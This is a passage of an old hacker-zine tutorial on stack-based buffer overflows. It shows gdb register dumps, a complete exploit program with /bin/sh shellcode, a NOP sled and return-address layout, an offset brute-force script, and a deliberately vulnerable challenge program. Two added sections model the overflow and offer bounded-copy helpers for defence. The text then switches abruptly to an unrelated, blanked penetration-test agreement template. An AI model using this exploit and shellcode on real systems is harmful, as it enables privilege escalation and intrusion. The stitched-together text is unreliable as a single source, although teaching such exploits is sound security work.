Ok, that didn't work anymore. I used A because it is 0x41 in
hexadecimal. (0x41 is easy to spot when you debug your program.) And
I used 4 A's because the memory works in multiples of 4.

Let's examine what exactly happened. According to our theory above,
only the Frame Pointer (EBP) is overwritten, and not yet the EIP
register (the return address, which is what we really want to
overwrite).

[root@daveli whiz]# gdb ./vuln1 core
GNU gdb 19991116 Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `./vuln1 12345678901234567890123456789012AAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x40031902 in __libc_start_main (main=Cannot access memory at address
0x41414149 ) at ../sysdeps/generic/libc-start.c:55 55 ..
sysdeps/generic/libc-start.c: No such file or directory.
(gdb) info registers
eax 0x0 0
ecx 0x40014000 1073823744
edx 0x0 0
ebx 0x400fa120 1074766112
esp 0xbffff9f4 0xbffff9f4
ebp 0x41414141 0x41414141
esi 0x40012eb0 1073819312
edi 0x400ea533 1074701619
eip 0x40031902 0x40031902
eflags 0x10246 66118
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x0 0
fs 0x2b 43
gs 0x2b 43
fctrl 0x0 0
fstat 0x0 0
ftag 0x0 0
fiseg 0x0 0
fioff 0x0 0
---Type <return> to continue, or q <return> to quit---
foseg 0x0 0
fooff 0x0 0
fop 0x0 0
(gdb)

Aha, you can clearly see the register EBP is overwritten with 0x41414141.
Good, but what we really want is to get EIP overwritten, so that we
can execute our own code. Let's start our example program one more time,
but add another 4 A's to the command line.

[root@daveli whiz]# ./vuln1 12345678901234567890123456789012AAAAAAAA
buffer = 12345678901234567890123456789012AAAAAAAA
strcpy() executed...
Segmentation fault (core dumped)

Let's start up gdb again.

[root@daveli whiz]# gdb ./vuln1 core
GNU gdb 19991116
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `./vuln1 12345678901234567890123456789012AAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x41414141 in ?? ()
(gdb) info registers
eax 0x0 0
ecx 0x40014000 1073823744
edx 0x0 0
ebx 0x400fa120 1074766112
esp 0xbffff884 0xbffff884
ebp 0x41414141 0x41414141
esi 0x40012eb0 1073819312
edi 0x400ea533 1074701619
eip 0x41414141 0x41414141
eflags 0x10246 66118
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x2b 43
gs 0x2b 43
fctrl 0x0 0
fstat 0x0 0
ftag 0x0 0
fiseg 0x0 0
fioff 0x0 0
---Type <return> to continue, or q <return> to quit---
foseg 0x0 0
fooff 0x0 0
fop 0x0 0
(gdb)

And look, EIP is also overwritten with 4 A's (0x41414141).
This means that we can jump to any address in the stack
(given that it is in our process space, or else we will get a
segmentation violation).
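
The two core dumps above can be reproduced without crashing anything by
modelling the frame as plain bytes. This is an added example, not part of
the original article: it replays the unchecked copy on the article's
[buffer] [ebp] [eip] layout for each input used so far. The saved register
values and all names are constructed, and a real compiler may lay the
frame out differently.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample values for the two saved registers (not from the article). */
#define SAVED_EBP 0xbffffa18u
#define SAVED_EIP 0x4003abcdu

/* Byte-level model of the frame the article draws: [buffer] [ebp] [eip].
 * Registers are kept as raw bytes and decoded little-endian, as on x86,
 * so the model gives the same answer on any host. */
struct frame_model {
    unsigned char buffer[32];    /* char buffer[30], rounded up to 32 */
    unsigned char saved_ebp[4];
    unsigned char saved_eip[4];
    unsigned char beyond[64];    /* caller's data; keeps the demo in bounds */
};

struct outcome {
    size_t written;              /* bytes stored, terminating NUL included */
    uint32_t ebp;                /* saved EBP after the copy */
    uint32_t eip;                /* saved EIP after the copy */
};

static uint32_t le32(const unsigned char *b)
{
    return (uint32_t)b[0] | ((uint32_t)b[1] << 8) |
           ((uint32_t)b[2] << 16) | ((uint32_t)b[3] << 24);
}

static void put_le32(unsigned char *b, uint32_t v)
{
    b[0] = (unsigned char)v;
    b[1] = (unsigned char)(v >> 8);
    b[2] = (unsigned char)(v >> 16);
    b[3] = (unsigned char)(v >> 24);
}

/* Replays strcpy(buffer, arg) on the model: every byte of arg plus the NUL
 * is stored from buffer[0] upward with no regard for the size of buffer. */
static struct outcome simulate(const char *arg)
{
    struct frame_model f;
    struct outcome o;
    size_t n = strlen(arg) + 1;

    memset(&f, 0, sizeof f);
    put_le32(f.saved_ebp, SAVED_EBP);
    put_le32(f.saved_eip, SAVED_EIP);
    if (n > sizeof f)
        n = sizeof f;            /* clamp: the model itself must not overflow */
    memcpy((unsigned char *)&f, arg, n);
    o.written = n;
    o.ebp = le32(f.saved_ebp);
    o.eip = le32(f.saved_eip);
    return o;
}

/* Which part of the frame did the copy reach? */
static const char *verdict(struct outcome o)
{
    if (o.written <= offsetof(struct frame_model, saved_ebp))
        return "frame intact";
    if (o.written <= offsetof(struct frame_model, saved_eip))
        return "saved EBP damaged";
    return "saved EIP damaged";
}

int main(void)
{
    /* The inputs used in the article's test runs. */
    static const char *inputs[] = {
        "1234567890",
        "123456789012345678901234567890",
        "12345678901234567890123456789012",
        "12345678901234567890123456789012AAAA",
        "12345678901234567890123456789012AAAAAAAA",
    };
    size_t i;

    for (i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        struct outcome o = simulate(inputs[i]);
        printf("%2zu bytes written  ebp=0x%08lx  eip=0x%08lx  %s\n",
               o.written, (unsigned long)o.ebp, (unsigned long)o.eip,
               verdict(o));
    }
    return 0;
}
```

In the model the terminating NUL matters as much as the A's: the 32-byte
input already zeroes the low byte of the saved EBP, and the 36-byte input
zeroes the low byte of the saved EIP.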

Now it's time to write an exploit!
(To make it a little bit easier, I increase the buffer of our vulnerable
program from 30 bytes to 128 bytes. You should do this also, or else
the following instructions will fail. This is because our shellcode is
approximately 30 to 40 bytes big; otherwise it would be too much trouble
fitting our shellcode into the buffer.)

The following exploit code is mainly taken from Aleph1's article,
but this is just general exploit code that is usable in 99% of the
cases. The comments on every line are mine.

<---------expl1.c------------------------------------

/* Exploit for vuln1.c according to my article
* about stack based buffer overflows
*
* The Itch / BsE
* root@bse.die.ms
* http://bse.die.ms
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Here we define how much bytes off our shellcode is from ESP */
#define DEFAULT_OFFSET 0

/* Here we define how big our buffer must be. The optimal thing to do
* is to use 100 bytes more then the buffer you are trying to overflow.
* This is because this is the total size of our shellcode, nops and
* return address.
*/
#define DEFAULT_BUFFER_SIZE 228

/* NOP means No OPeration, if this code is executed, there wont happen
* anything and the program just continues to execute, later on you will
* see why this is very handy
*/
#define NOP 0x90

/* this function determines the current ESP register */
unsigned long get_sp(void)
{
__asm__("movl %esp, %eax");
}

/* These are assembler instructions to start a shell, we set this code
* into the memory, and overwrite the original return address with the
* return address pointing to this shellcode, so that our shell gets
* started. The only thing that this code does is executing /bin/sh
* (below asm instructions are just a execve() call of /bin/sh)
*/
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[])
{
/* define our exploit buffer */
char *buff;

/* define our pointer */
char *ptr;

/* our address pointer, where we will put in our
* return address
*/
long *addr_ptr;

long addr; /* our return address */

/* how many bytes different is our return address from ESP ? */
int offset = DEFAULT_OFFSET;

/* our buffersize */
int bsize = DEFAULT_BUFFER_SIZE;

/* the integer we use for our for loops */
int i;

/* Our start arguments for our exploit can be:
* ./expl1 buffersize offset
* if the exploit is started with ./expl1 buffersize
* then use that buffersize instead of the one that
* we define with #define DEFAULT_BUFFER_SIZE
*/
if(argc > 1) { bsize = atoi(argv[1]); }

/* same as above, but with the offset */
if(argc > 2) { offset = atoi(argv[2]); }

/* check if there is enough available memory for our buffer */
if(!(buff = malloc(bsize)))
{
printf("Unable to allocate memory.\n");
exit(0);
}

/* The return address of our shellcode, calculated by the stack
* pointer minus our offset (because the stack grows downwards, it
* has to be minus). In a lot of cases the current stackpointer is
* also the return address, or it only lies a few bytes of it.
*/
addr = get_sp() - offset;

printf("exploit for vuln1\n\n");
printf("Coded by The Itch / BsE\n");
printf("Using return address: 0x%x\n", addr);
printf("stack pointer: 0x%x\n", get_sp());
printf("Using buffersize: %d\n", bsize);

ptr = buff;
addr_ptr = (long *) ptr;

/* Here we fill our buffer with the return address from our buffer */
for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = addr; }

/* After that we fill the first half of our buffer with NOP's */
for(i = 0; i < bsize / 2; i++) { buff[i] = NOP; }

/* Put ptr(the pointer) on the second part of our buffer, and
* reserve length for our shellcode and put half of it in the
* first half of our buffer
*/
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));

/* Put our shellcode in the first half of our buffer */
for(i = 0; i < strlen(shellcode); i++) { *(ptr++) = shellcode[i]; }

/* ending null string for strcpy() (so that it stops with
* copying things from argv[1] into the buffer[])
*/
buff[bsize - 1] = '\0';

/* put in front of buff[] the word EGG= */
memcpy(buff, "EGG=", 4);

/* And place buff after that into the enviroment */
putenv(buff);

/* execute our vulnerable program */
system("./vuln1 $EGG");

return 0;
}

/* Remember, there is no cure for BsE */

<-------expl1.c------------------------------------

What we did exactly is this:

The buffer that we want to overflow is 128 bytes big. (The following
examples are not to scale, because they wouldn't fit in the article.)
The shellcode is approximately 30 to 40 bytes big (count it out yourself),
so, for our convenience, let's say our shellcode is 35 bytes big.

So our number of NOP's would be: (228/2) - (35/2) = 96 NOP's. After that
there will be 35 / 2 bytes of shellcode in it (so 96 + (35/2)).
And after that we fill out our buffer with the return address, so
we could also define 128+8 bytes as our buffer. (But take note that
in that case there wouldn't be 96 NOP's, but ((128+8)/2) - (35/2)
NOP's.)

But if you do it that way, you have less chance of finding the
right offset for our return address. So we take a big number of NOP's:
the more NOP's, the more chance that we find a usable return address.
But take care that you don't take too MANY NOP's, because you risk
overwriting EIP with either NOP's or your shellcode instead of your
return address.


# = original buffer
N = NOP
S = Shellcode
R = return address of our shellcode

The original buffer will look like this:

[##########################################################] [EBP] [EIP]

After our exploit, it will look like this:

[NNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSSSSSSSSSRRRRRRRRRRRRRRRRRR] [RRR] [RRR]

As you can see, EBP and EIP are overwritten with the return address of
our shellcode and NOP's. We hope that our return address points either
into the NOP's or at the beginning of our buffer.

This is also the reason that I use NOP's in my exploit, because if I
didn't use NOP's, it would look like this:

Original buffer:

[##########################################################] [EBP] [EIP]

Buffer after our exploit without using NOP's:
[RRRRRRRRRRRRRRRRRRRRRRRRSSSSSSSSSSSSSSSSSSSSSRRRRRRRRRRRRR] [RRR] [RRR]

In this case, we have only one valid return address, and that is the
one at the beginning of the shellcode. If we started even one byte
earlier or later, the program that we are trying to exploit would
segfault. That is because the return address is a pointer and is not
used for execution.

Well, let's just start testing. To avoid annoying beeps, you can just
remove the line printf("buffer = %s\n", buffer); from vuln1.c
and recompile. (This is of course not necessary, but when you
start bruteforcing offsets, it is very handy.)

[root@daveli whiz]# gcc vuln1.c -o vuln1
[root@daveli whiz]# gcc expl1.c -o expl1
[root@daveli whiz]# ./expl1
exploit for vuln1
Coded by The Itch / BsE
Using return address: 0xbffff9f4
stack pointer: 0xbffff9f4
Using buffersize: 228
strcpy() uitgevoerd...
[root@daveli whiz]#

Hmm, bad luck. As you can see, the stack pointer (ESP) wasn't exactly
the return address that we needed. So that will probably come down to
bruteforcing. But let us first just try some combinations.
(ALWAYS try positive and negative offsets!!)

[root@daveli whiz]# ./expl1 228 10
exploit voor vuln1 volgens het whizkunde artikel
Coded by The Itch / BsE
Using return address: 0xbffff9f2
stack pointer: 0xbffff9f4
Using buffersize: 228
strcpy() uitgevoerd...
[root@daveli whiz]#

hmm too bad, nothing again ....

[root@daveli whiz]# ./expl1 228 20
exploit voor vuln1 volgens het whizkunde artikel
Coded by The Itch / BsE
Using return address: 0xbffff9e8
stack pointer: 0xbffff9f4
Using buffersize: 228
strcpy() uitgevoerd...
[root@daveli whiz]#

And again nothing, now lets try a negative offset.

[root@daveli whiz]# ./expl1 228 -5
exploit voor vuln1 volgens het whizkunde artikel
Coded by The Itch / BsE
Using return address: 0xbffffa01
stack pointer: 0xbffff9f4
Using buffersize: 228
strcpy() uitgevoerd...
sh-2.03#

BAMM, jackpot!! Our return address was 5 bytes off from the stack pointer.
I say off, and not less, because the stack grows downwards.

Alas, this is not the same on every computer, so it could be that in
your case the offset of -5 bytes doesn't work. (In my case the return
address of the shellcode lies around the address 0xbffffa00.)

In some rare cases, your offset can be 1000 bytes or more off from
the stack pointer. In those cases you need to bruteforce the
right offset. That goes as follows:

<------offsetbruteforce.sh----------------

#!/bin/sh
OFFSET=1
while test $OFFSET -lt 10000
do
./expl1 228 $OFFSET
OFFSET=`expr $OFFSET + 1`
done

<-----offsetbruteforce.sh----------------

If you didn't get a sh-2.03# shell like me, it is time for you to
bruteforce ;)

Just run ./offsetbruteforce.sh and have some patience. If, after a
while, you still don't get a shell, then edit expl1.c (your exploit) and
change addr = get_sp() - offset; into: addr = get_sp() + offset;
then recompile your exploit and rerun offsetbruteforce.sh.

If you want to exploit programs from other people, you have to look
for functions that don't do bounds checking. Besides strcpy(),
strcat(), sprintf(), vsprintf() and gets() also don't do bounds checking.
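
Read from the defender's side, the same list is what a code review should
flag, starting with the strcpy() call in vuln1.c. The following is an added
example, not part of the original article: bounded stand-ins for each of
those calls that refuse input that does not fit, applied to vuln1.c's
30-byte buffer. All function names are illustrative.

```c
#include <limits.h>
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Every helper returns 0 on success and -1 when the input does not fit.
 * Over-long input is refused, never silently truncated. */

/* strcpy() replacement: src must fit in dst together with its NUL. */
static int copy_checked(char *dst, size_t dstsize, const char *src)
{
    const char *nul;

    if (dst == NULL || dstsize == 0)
        return -1;
    /* memchr() scans at most dstsize bytes and stops at the first NUL */
    nul = src ? memchr(src, '\0', dstsize) : NULL;
    if (nul == NULL) {
        dst[0] = '\0';
        return -1;
    }
    memmove(dst, src, (size_t)(nul - src) + 1);
    return 0;
}

/* strcat() replacement: on failure dst keeps its old contents. */
static int append_checked(char *dst, size_t dstsize, const char *src)
{
    char *end;

    if (dst == NULL || src == NULL || dstsize == 0)
        return -1;
    end = memchr(dst, '\0', dstsize);
    if (end == NULL)
        return -1;               /* dst is not a terminated string */
    return copy_checked(end, dstsize - (size_t)(end - dst), src);
}

/* sprintf()/vsprintf() replacement built on vsnprintf(). */
static int format_checked(char *dst, size_t dstsize, const char *fmt, ...)
{
    va_list ap;
    int n;

    if (dst == NULL || dstsize == 0 || fmt == NULL)
        return -1;
    va_start(ap, fmt);
    n = vsnprintf(dst, dstsize, fmt, ap);
    va_end(ap);
    if (n < 0 || (size_t)n >= dstsize) {
        dst[0] = '\0';           /* would have been truncated: reject */
        return -1;
    }
    return 0;
}

/* gets() replacement: stores one line without its newline; a line longer
 * than dstsize - 1 characters is discarded completely. */
static int read_line_checked(char *dst, size_t dstsize, FILE *in)
{
    size_t len;
    int c;

    if (dst == NULL || dstsize < 2 || dstsize > INT_MAX || in == NULL)
        return -1;
    if (fgets(dst, (int)dstsize, in) == NULL) {
        dst[0] = '\0';
        return -1;               /* end of file or read error */
    }
    len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[len - 1] = '\0';
        return 0;
    }
    c = getc(in);                /* buffer full or EOF: peek at what follows */
    if (c == EOF || c == '\n')
        return 0;
    while (c != EOF && c != '\n')
        c = getc(in);            /* drain so the next read starts on a new line */
    dst[0] = '\0';
    return -1;
}

/* vuln1.c's copy into char buffer[30], with the check strcpy() lacks. */
static int handle_argument(const char *arg)
{
    char buffer[30];

    if (copy_checked(buffer, sizeof buffer, arg) != 0)
        return -1;
    printf("buffer = %s\n", buffer);
    return 0;
}

int main(int argc, char *argv[])
{
    return (argc > 1 && handle_argument(argv[1]) == 0) ? 0 : 1;
}
```

Note that the 30-character input the article feeds to vuln1 is rejected
here: 30 characters plus the terminating NUL need 31 bytes.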

In my next article I will try to explain how we exploit programs that
have a buffer too small to place shellcode in. But for now, it has
been enough. I think you can spend some time on this article to
figure out more yourself.

And, if you think you know how stack based buffer overflows work, I
challenge you to exploit the next program successfully.

ps: for more shellcode see: http://bse.die.ms/~itchie/stuff/exploits/shellcode.h

<---------------vuln2.c-----------------------
/* vuln2.c for my article about stack based buffer overflows
* exploit this one yourself successfull! ;-)
*
* Coded by The Itch / BsE
* root@bse.die.ms
* http://bse.die.ms
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[512];
    char *buf2;

    if(argc < 2)
    {
        printf("syntax: %s \n\n", argv[0]);
        exit(0);
    }

    if(getenv("TEST") == 0)
    {
        printf("error, no enviromental string found!\n");
        printf("Aborting program...\n\n");
        exit(0);
    }

    buf2 = getenv("TEST");
    /* no length check on the environment string */
    strcpy(buffer, buf2);
    printf("Using enviromental string: %s\n", buf2);

    return 0;
}

/* Remember, there is no cure for BsE */

<------------vuln2.c------------------


greetings,
The_Itch
root@bse.die.ms
http://bse.die.ms

irc.axenet.org - #axenet

_____________________________________________________________________
§=------------------------------]-§-[------------------------------=§
\\ THIS FILE WAS SUBMITTED TO SOLDIERX //
\\ http://www.soldierx.com //
\\ NOBODY CAN STOP INFORMATION INSEMINATION //
§=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++=§

ETHICAL HACKING AGREEMENT


External Network Security – Unannounced Penetration Test

FACILITY: _____________________________________

DATE: _________________________________________

OBJECTIVE: To provide an assessment of the site’s external security profile of networked computer systems and intrusion detection capabilities.

SCENARIO: Testing will consist of four phases, during which various tools and techniques will be used to gain information and identify vulnerabilities associated with the site’s computer systems and subsequent attempts to penetrate the network. These phases, discussed in detail below are: network mapping; vulnerability identification; exploitation; and reporting.

Network Mapping
will obtain much of the required information regarding the
site’s network profile, such as IP address ranges, telephone number ranges, and
other general network topology through public information sources, such as
Internet registration services, web pages, and telephone directories. More
detailed information about the site’s network architecture will be obtained
through the use of domain name server (DNS) queries, ping sweeps, port scans,
and connection route tracing. Informal inquiries, not linked to Independent
Oversight, may also be attempted to gather information from users and
administrators that could assist in gaining access to network resources. Once
this general network information is compiled and analyzed,
will begin identification of individual system vulnerabilities.

Vulnerability Identification
During this phase, will attempt to associate operating
systems and applications with identified computers on the network. Depending
upon network architecture, this may be accomplished using automated tools, such
as nmap and queso, or using manual techniques, such as telnet, ftp, or sendmail
login banners. Using this information, will create a list
of probable vulnerabilities associated with each potential target system. Also,
at this point, automated scripts will be developed or compiled to attempt
exploitation of vulnerabilities.

Exploitation
During this phase, system and user information will be used to attack the
authentication processes of the target systems. Example attack scenarios in this
phase include, but are not limited to: buffer overflows, application or system
configuration problems, modems, routing issues, DNS attacks, address spoofing,
share access and exploitation of inherent system trust relationships. Potential
vulnerabilities will be systematically tested in the order of penetration and
detection probability as determined by the members of the
penetration testing team. The strength of captured password files will be tested
using password-cracking tools. Individual user account passwords may also be
tested using dictionary-based, automated login scripts. In the event that an
account is compromised, will attempt to elevate privileges
to that of super user, root, or administrator level.

Since the goal of testing is to determine the extent of
vulnerabilities, and not simply penetrate a single site system, information
discovered on one system may be used to gain access to additional systems that
may be "trusted" by the compromised system. Additionally, host-level
vulnerabilities may be exploited to elevate privileges within the compromised
system to install "sniffers" or other utilities. will
insert a small text file at the highest level directory of each compromised
system. In those cases where is unable to gain sufficient
privilege to write to the system, a file will be copied from the system. In
either case, additional files may be copied during testing if further review is
required to determine sensitivity of information contained on the system.
will maintain detailed records of all attempts to exploit
vulnerabilities and activities conducted during the attack phase.

Reporting
will provide an on-site briefing of results. These results
will also be documented in a management level report provided to the site,
Operations Office, and responsible Headquarters Program Offices that will cover
the unannounced penetration testing. Specific details on vulnerabilities will
also be provided to site technical personnel.

SPECIAL CONSIDERATIONS:
will coordinate testing activities with a "trusted
agent" in each organization listed on the performance test agreement as
appropriate. Each organization should identify an individual to be designated
as a trusted agent. More than one trusted agent may be identified at the site,
however, the number should be kept to an absolute minimum. All personnel who
are informed of the testing will maintain strict confidentiality to ensure the
validity of test results.

The Operations Office will coordinate with trusted agents at the site to
identify critical systems that should be excluded from testing activities
(e.g., safety systems, major applications undergoing upgrades or other special
evolutions). Specific network addresses and reasons for exclusion should be
provided as an attachment to the signed performance test.

The Operations Office will identify any systems or network nodes that are
connected to the site network, but are not under the direct control and
responsibility of the site or the cognizant Operations Office. These systems
will be excluded from testing unless obtains permission
from the system owner.

will provide the DOE Computer Incident Advisory
Capability (CIAC) with information regarding the systems used for scanning and
testing activities to ensure that testing activities are not confused with
real attacks.

While will not attempt to exploit "denial of service"
vulnerabilities (unless specifically requested by competent authority) and
every attempt will be made to prevent damage to any information system and the
data it holds, some penetration attempt scenarios have the possibility of
causing service interruption. In the unlikely event that such an event occurs,
will work with the trusted agents at the site to
determine the nature of the problem and restore the system to its desired
state of operation.

All information obtained by will be protected (to the
extent possible) from unauthorized access.

In the event that any site personnel (excluding trusted agents) identify
testing activities, site computer security personnel
should document the detection of activity and take initial actions that would
be taken in the case of a real intrusion, including informing CIAC. If
notified by the site of incidents that correspond with OA penetration testing,
CIAC and the site’s trusted agents will inform the appropriate site computer
security personnel that the activity identified is part of an authorized DOE
test. OA will also be informed of the detection. In these cases, logs or other
evidence of intrusion detection activities should be provided to Independent
Oversight for analysis. testing will then be allowed to
continue as an announced external network security assessment without
blocking, filtering, or restricting access.

It is the site’s responsibility to restore network computer systems to a
secure configuration after testing. Independent
Oversight will coordinate with and provide assistance (as requested) to system
administrators during this period of "cleaning up" network computer systems.
Clean-up may consist of removing added programs and files, identifying systems
whose password files were compromised, and restoring systems to a secure
configuration so that no systems are left in a compromised condition.

As evidenced by their signature on this performance test agreement, Operations
Office and site contractor representatives certify that the Department’s
Banner and Warning Policy has been implemented at the site and network
computer users have, as a result, granted constructive consent to this type of
activity.


APPROVALS:

______________________________________________________________
Director, Office of Cyber Security and Special Reviews

______________________________________________________________
Office of Chief Information Officer Representative

______________________________________________________________
Lead Program Secretarial Office Representative

______________________________________________________________
Operations Office Representative

______________________________________________________________
Site Contractor Representative
